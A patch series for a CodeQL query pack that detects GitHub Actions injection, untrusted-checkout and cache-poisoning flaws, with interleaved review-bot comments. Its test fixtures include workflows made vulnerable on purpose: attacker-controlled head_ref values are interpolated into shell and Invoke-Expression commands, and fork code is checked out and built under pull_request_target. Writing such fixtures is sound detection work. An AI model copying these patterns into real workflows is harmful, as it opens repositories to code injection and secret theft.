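Review bot: The callee list inside `exists(UsesStep step | …)` in ActionsSHACheckout now hard-codes four action names, while this commit also models each of the same actions in its own file under ql/lib/ext/manual/, so the two lists have to be kept in step by hand and nothing says so. A comment above the list would record that, for example `// keep in sync with the actionsSourceModel entries for these actions under ext/manual/`. The unchanged `regexpMatch(".*head_sha.*")` on the following line means this disjunct only recognises a checkout of the SHA output. Whether a checkout of the newly modelled `head_ref` output is flagged for the two added actions depends on code outside this hunk and is worth confirming. The class body starts and ends outside the hunk.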
diff --git a/ql/lib/ext/manual/tj-actions_branch-names.model.yml b/ql/lib/ext/manual/tj-actions_branch-names.model.yml index 91f3c056e6d..56f017635ce 100644 --- a/ql/lib/ext/manual/tj-actions_branch-names.model.yml +++ b/ql/lib/ext/manual/tj-actions_branch-names.model.yml @@ -6,5 +6,3 @@ extensions: # https://github.com/tj-actions/branch-names - ["tj-actions/branch-names", "*", "output.current_branch", "branch", "manual"] - ["tj-actions/branch-names", "*", "output.head_ref_branch", "branch", "manual"] - - ["tj-actions/branch-names", "*", "output.ref_branch", "branch", "manual"] - diff --git a/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml b/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml new file mode 100644 index 00000000000..e4b34c37d70 --- /dev/null +++ b/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + - ["xt0rted/pull-request-comment-branch", "*", "output.head_ref", "branch", "manual"] + diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 18f72de36d1..b09473fc132 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
@@ -619,12 +619,15 @@ scopes sources | ahmadnassri/action-changed-files | * | output.files | filename | manual | | ahmadnassri/action-changed-files | * | output.json | json | manual | +| alessbell/pull-request-comment-branch | * | output.head_ref | branch | manual | | amannn/action-semantic-pull-request | * | output.error_message | text | manual | | cypress-io/github-action | * | env.GH_BRANCH | branch | manual | | dawidd6/action-download-artifact | * | output.artifacts | artifact | manual | +| eficode/resolve-pr-refs | * | output.head_ref | branch | manual | | franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | text | manual | | franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | title | manual | | googlecloudplatform/magic-modules | * | output.changed-files | filename | manual | +| gotson/pull-request-comment-branch | * | output.head_ref | branch | manual | | jitterbit/get-changed-files | * | output.added | filename | manual | | jitterbit/get-changed-files | * | output.added_modified | filename | manual | | jitterbit/get-changed-files | * | output.all | filename | manual | 
@@ -639,12 +642,12 @@ sources | redhat-plumbers-in-action/download-artifact | * | output.* | artifact | manual | | tj-actions/branch-names | * | output.current_branch | branch | manual | | tj-actions/branch-names | * | output.head_ref_branch | branch | manual | -| tj-actions/branch-names | * | output.ref_branch | branch | manual | | trilom/file-changes-action | * | output.files | filename | manual | | trilom/file-changes-action | * | output.files_added | filename | manual | | trilom/file-changes-action | * | output.files_modified | filename | manual | | trilom/file-changes-action | * | output.files_removed | filename | manual | | tzkhan/pr-update-action | * | output.headMatch | branch | manual | +| xt0rted/pull-request-comment-branch | * | output.head_ref | branch | manual | | xt0rted/slash-command-action | * | output.command-arguments | text | manual | summaries | akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test7.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test7.yml new file mode 100644 index 00000000000..cae9358e8b7 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test7.yml @@ -0,0 +1,20 @@ +name: Test +on: issue_comment +permissions: write-all +jobs: + test: + name: Test + runs-on: ubuntu-latest + steps: + - id: comment-branch + uses: xt0rted/pull-request-comment-branch@v2 + with: + repo_token: ${{ github.token }} + - id: refs + uses: eficode/resolve-pr-refs@main + with: + token: ${{ github.token }} + - run: | + echo "HEAD_REF1 from PR: ${{ steps.comment-branch.outputs.head_ref }}" + - run: | + echo "HEAD_REF2 from PR: ${{ steps.refs.outputs.head_ref }}" diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index fdb5beb09aa..f34915f45c2 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
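Review bot: The new fixture test7.yml exercises only `xt0rted/pull-request-comment-branch` and `eficode/resolve-pr-refs`, although this commit also adds source models for `alessbell/pull-request-comment-branch` and `gotson/pull-request-comment-branch`. A typo in either of those two model files would therefore leave the CodeInjection expected results unchanged and go unnoticed. Adding one `uses:` step and one `run:` step per extra action would cover them; the action refs below are placeholders because the page does not show which versions exist. The .expected files would need regenerating afterwards.

```yaml
    steps:
      # … unchanged: comment-branch and refs steps and their two run steps …
      - id: comment-branch-alessbell
        uses: alessbell/pull-request-comment-branch@REF_PLACEHOLDER
      - id: comment-branch-gotson
        uses: gotson/pull-request-comment-branch@REF_PLACEHOLDER
      - run: |
          echo "HEAD_REF3 from PR: ${{ steps.comment-branch-alessbell.outputs.head_ref }}"
      - run: |
          echo "HEAD_REF4 from PR: ${{ steps.comment-branch-gotson.outputs.head_ref }}"
```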
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -65,6 +65,8 @@ edges | .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | provenance | | | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | provenance | | | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | provenance | | +| .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | provenance | | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | provenance | | 
@@ -243,6 +245,10 @@ nodes | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | semmle.label | toJSON(github.event.comment.body).foo | +| .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | semmle.label | Uses Step: comment-branch | +| .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | semmle.label | Uses Step: refs | +| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | semmle.label | steps.comment-branch.outputs.head_ref | +| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | semmle.label | steps.refs.outputs.head_ref | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -340,6 +346,8 @@ subpaths | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | +| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | +| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index bd20179796e..d919880e726 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -65,6 +65,8 @@ edges | .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | provenance | | | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | provenance | | | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | provenance | | +| .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | provenance | | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | provenance | | 
@@ -243,6 +245,10 @@ nodes | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | semmle.label | toJSON(github.event.comment.body).foo | +| .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | semmle.label | Uses Step: comment-branch | +| .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | semmle.label | Uses Step: refs | +| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | semmle.label | steps.comment-branch.outputs.head_ref | +| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | semmle.label | steps.refs.outputs.head_ref | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From 1fd7c148a5e771ae5041ea0e5d34f2c57e1df3e6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 25 Jun 2024 13:58:25 +0200 Subject: [PATCH 0348/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index aece8aacc5f..761554c60e6 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.3 +version: 0.1.4 dependencies: codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 74678b945ca..9ccc911594f 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml 
@@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.3 +version: 0.1.4 groups: [actions, queries] suites: codeql-suites extractor: javascript From e6311966c80fae7fdf43db6ff43c88600933d08e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 26 Jun 2024 16:17:07 +0200 Subject: [PATCH 0349/1267] Take explicit permission into account for privilege calculation --- ql/lib/codeql/actions/ast/internal/Ast.qll | 28 +++++++++-- .../CWE-349/.github/workflows/test20.yml | 46 +++++++++++++++++++ .../CWE-829/.github/workflows/test4.yml | 46 +++++++++++++++++++ .../UntrustedCheckoutCritical.expected | 1 - .../CWE-829/UntrustedCheckoutMedium.expected | 2 + 5 files changed, 118 insertions(+), 5 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test20.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 8d965c3e4c7..2deb987650c 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
@@ -848,11 +848,23 @@ class JobImpl extends AstNodeImpl, TJobNode { this.getPermissions().getAPermission().matches("%write") } + private predicate hasExplicitReadPermission() { + // the job has not an explicit write permission + exists(this.getPermissions().getAPermission()) and + not this.getPermissions().getAPermission().matches("%write") + } + private predicate hasImplicitWritePermission() { // the job has an explicit write permission this.getEnclosingWorkflow().getPermissions().getAPermission().matches("%write") } + private predicate hasImplicitReadPermission() { + // the job has not an explicit write permission + exists(this.getEnclosingWorkflow().getPermissions().getAPermission()) and + not this.getEnclosingWorkflow().getPermissions().getAPermission().matches("%write") + } + private predicate hasRuntimeData() { exists(string path, string trigger, string name, string secrets_source, string perms | workflowDataModel(path, trigger, name, secrets_source, perms, _) and @@ -892,8 +904,7 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Holds if the action is privileged and externally triggerable. */ predicate isPrivilegedExternallyTriggerable() { - exists(EventImpl e | - this.getATriggerEvent() = e and + exists(EventImpl e | this.getATriggerEvent() = e | // job is triggereable by an external user e.isExternallyTriggerable() and // no matter if `pull_request` is granted write permissions or access to secrets 
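Review bot: The comment `// the job has not an explicit write permission` is pasted onto both new predicates, and on `hasImplicitReadPermission()` it names the wrong scope, because that predicate reads `this.getEnclosingWorkflow().getPermissions()` rather than the job's own block. I would write `// the job declares permissions and none of them grants write` on `hasExplicitReadPermission()` and `// the enclosing workflow declares permissions and none of them grants write` on `hasImplicitReadPermission()`. The unchanged comment on `hasImplicitWritePermission()` has the same slip (it says "the job has an explicit write permission" while testing the workflow) and is worth correcting in the same pass. These helpers feed the privilege decision in `isPrivilegedExternallyTriggerable()`, so the comments should match the scope that is actually checked.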
@@ -903,9 +914,18 @@ class JobImpl extends AstNodeImpl, TJobNode { // job is privileged (write access or access to secrets) this.isPrivileged() or - // the trigger event is __normally__ privileged and we have no runtime data to prove otherwise + // the trigger event is __normally__ privileged + e.isPrivileged() and + // and we have no runtime data to prove otherwise not this.hasRuntimeData() and - e.isPrivileged() + // and the job is not explicitly non-privileged + not ( + ( + this.hasExplicitReadPermission() or + this.hasImplicitReadPermission() + ) and + not this.hasExplicitSecretAccess() + ) ) ) } diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test20.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test20.yml new file mode 100644 index 00000000000..a07f2922fd7 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test20.yml @@ -0,0 +1,46 @@ +name: Publish + +on: + push: + branches: + - main + pull_request_target: + workflow_dispatch: + workflow_call: + +jobs: + build-and-upload: + runs-on: ubuntu-latest + permissions: + contents: read + steps: + + - name: Checkout PR + if: ${{ github.event_name == 'pull_request_target' }} + uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + + - name: Checkout + if: ${{ github.event_name != 'pull_request_target' }} + uses: actions/checkout@v3 + with: + ref: main + + - name: Setup Pages + uses: actions/configure-pages@v1 + - name: Use Node.js + uses: actions/setup-node@v3 + with: + node-version: 18 + cache: npm + - name: Update npm to latest + run: npm i --prefer-online --no-fund --no-audit -g npm@latest + - run: npm -v + - run: npm i --ignore-scripts --no-audit --no-fund --package-lock + - run: npm run build -w www + - name: Upload artifact + uses: actions/upload-pages-artifact@v1 + with: + path: './workspaces/www/build' 
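Review bot: The new exemption `not ((this.hasExplicitReadPermission() or this.hasImplicitReadPermission()) and not this.hasExplicitSecretAccess())` is a double negation that carries a severity decision, and it is hard to audit inline. I would move the inner condition into a named private predicate beside the permission helpers (for example `isExplicitlyNonPrivileged()`) and call `not this.isExplicitlyNonPrivileged()` here, with a comment such as `// read-only token and no secret references: not privileged even on a privileged trigger`. `hasExplicitSecretAccess()` is defined outside this hunk, so it is worth confirming that it also covers secrets which reach the job without a literal reference in it. A job wrongly exempted here moves from the critical to the medium untrusted-checkout query, as `test3.yml` does in the updated expected files. `isPrivilegedExternallyTriggerable()` begins before this hunk.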
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml new file mode 100644 index 00000000000..a07f2922fd7 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml @@ -0,0 +1,46 @@ +name: Publish + +on: + push: + branches: + - main + pull_request_target: + workflow_dispatch: + workflow_call: + +jobs: + build-and-upload: + runs-on: ubuntu-latest + permissions: + contents: read + steps: + + - name: Checkout PR + if: ${{ github.event_name == 'pull_request_target' }} + uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + + - name: Checkout + if: ${{ github.event_name != 'pull_request_target' }} + uses: actions/checkout@v3 + with: + ref: main + + - name: Setup Pages + uses: actions/configure-pages@v1 + - name: Use Node.js + uses: actions/setup-node@v3 + with: + node-version: 18 + cache: npm + - name: Update npm to latest + run: npm i --prefer-online --no-fund --no-audit -g npm@latest + - run: npm -v + - run: npm i --ignore-scripts --no-audit --no-fund --package-lock + - run: npm run build -w www + - name: Upload artifact + uses: actions/upload-pages-artifact@v1 + with: + path: './workspaces/www/build' diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 0ff47fd2c53..92d5a0b5ce1 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -4,6 +4,5 @@ | .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/test3.yml:28:9:33:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index 544d26da9b7..5bf0e56e1b7 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -1,3 +1,5 @@ | .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/test3.yml:28:9:33:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 5cd292e23e034a593f1feac0f5bba0bac2c4666c Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 26 Jun 2024 19:17:37 +0200 Subject: [PATCH 0350/1267] Make Untrusted Checkout and CachePoisoning rules path-problems --- ql/src/Security/CWE-349/CachePoisoning.ql | 7 +- .../CWE-829/UntrustedCheckoutCritical.ql | 10 +- .../CWE-094/.github/workflows/test8.yml | 48 +++ .../CWE-094/CodeInjectionCritical.expected | 4 + .../CWE-094/CodeInjectionMedium.expected | 2 + .../Security/CWE-349/CachePoisoning.expected | 134 ++++++++- .../UntrustedCheckoutCritical.expected | 273 +++++++++++++++++- 7 files changed, 451 insertions(+), 27 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test8.yml diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index feef4316461..2a9952ce07f 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -1,7 +1,7 @@ /** * @name Cache Poisoning * @description The cache can be poisoned by untrusted code, leading to a cache poisoning attack. - * @kind problem + * @kind path-problem * @problem.severity error * @precision high * @security-severity 7.5 @@ -16,6 +16,8 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.CachePoisoningQuery import codeql.actions.security.PoisonableSteps +query predicate edges(Step a, Step b) { a.getAFollowingStep() = b } + from LocalJob j, Event e, PRHeadCheckoutStep checkout, Step s where j.getATriggerEvent() = e and @@ -48,5 +50,4 @@ where // excluding privileged workflows since they can be exploited in easier circumstances not j.isPrivileged() ) -select checkout, "Potential cache poisoning in the context of the default branch on step $@.", s, - s.toString() +select s, checkout, s, "Potential cache poisoning in the context of the default branch" diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index eae580ebd52..b71b3cbba99 100644 
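Review bot: `query predicate edges(Step a, Step b) { a.getAFollowingStep() = b }` relates every step to its followers in every job of the database, not only the steps that take part in an alert; the same line is added to UntrustedCheckoutCritical.ql in this commit. Judging by the regenerated CachePoisoning.expected, `getAFollowingStep()` appears to yield all later steps rather than the next one, so the relation grows quadratically per job (the five-step job in test18.yml contributes ten rows) and each reported path is a single hop from checkout to sink. Restricting the source side would keep the path view while shrinking the relation and the expected files: `query predicate edges(Step a, Step b) { a instanceof PRHeadCheckoutStep and a.getAFollowingStep() = b }`. The new `select` in CachePoisoning.ql also drops the `$@` link and the trailing period from the message, which should be a deliberate choice since the alert text is what triage reads.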
--- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -3,7 +3,7 @@ * @description Priveleged workflows have read/write access to the base repository and access to secrets. * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment * that is able to push to the base repository and to access secrets. - * @kind problem + * @kind path-problem * @problem.severity error * @precision very-high * @security-severity 9.3 @@ -17,12 +17,14 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from LocalJob j, PRHeadCheckoutStep checkout +query predicate edges(Step a, Step b) { a.getAFollowingStep() = b } + +from LocalJob j, PRHeadCheckoutStep checkout, PoisonableStep s where j = checkout.getEnclosingJob() and j.getAStep() = checkout and // the checkout is followed by a known poisonable step - checkout.getAFollowingStep() instanceof PoisonableStep and + checkout.getAFollowingStep() = s and // the checkout is not controlled by an access check not exists(ControlCheck check | check.dominates(checkout)) and // the checkout occurs in a privileged context @@ -31,4 +33,4 @@ where or inPrivilegedExternallyTriggerableJob(checkout) ) -select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow." +select s, checkout, s, "Potential unsafe checkout of untrusted code on a privileged workflow." diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test8.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test8.yml new file mode 100644 index 00000000000..3b532e4cc67 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test8.yml 
@@ -0,0 +1,48 @@ +run-name: Cleanup ${{ github.head_ref }} +on: + pull_request_target: + types: labeled + paths: + - 'images/**' + +jobs: + clean_ci: + name: Clean CI runs + runs-on: ubuntu-latest + permissions: + actions: write + steps: + - env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + shell: pwsh + run: | + $startDate = Get-Date -UFormat %s + $workflows = @("macos11", "macos12", "ubuntu2004", "ubuntu2204", "windows2019", "windows2022") + while ($true) { + $continue = $false + foreach ($wf in $workflows) { + $skippedCommand = "gh run list --workflow ${wf}.yml --branch ${{ github.event.pull_request.head.ref }} --repo ${{ github.repository }} --status skipped --json databaseId" + $skippedIds = Invoke-Expression -Command $skippedCommand | ConvertFrom-Json | ForEach-Object { $_.databaseId } + $skippedIds | ForEach-Object { + $deleteCommand = "gh run delete --repo ${{ github.repository }} $_" + Invoke-Expression -Command $deleteCommand + } + $pendingCommand = "gh run list --workflow ${wf}.yml --branch ${{ github.event.pull_request.head.ref }} --repo ${{ github.repository }} --status requested --json databaseId --template '{{ . | len }}'" + $pending = Invoke-Expression -Command $pendingCommand + if ($pending -gt 0) { + Write-Host "Pending for ${wf}.yml: $pending run(s)" + $continue = $true + } + } + if ($continue -eq $false) { + Write-Host "All done, exiting" + break + } + $curDate = Get-Date -UFormat %s + if (($curDate - $startDate) -gt 60) { + Write-Host "Reached timeout, exiting" + break + } + Write-Host "Waiting 5 seconds..." + Start-Sleep -Seconds 5 + } diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index f34915f45c2..1b98263c16e 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
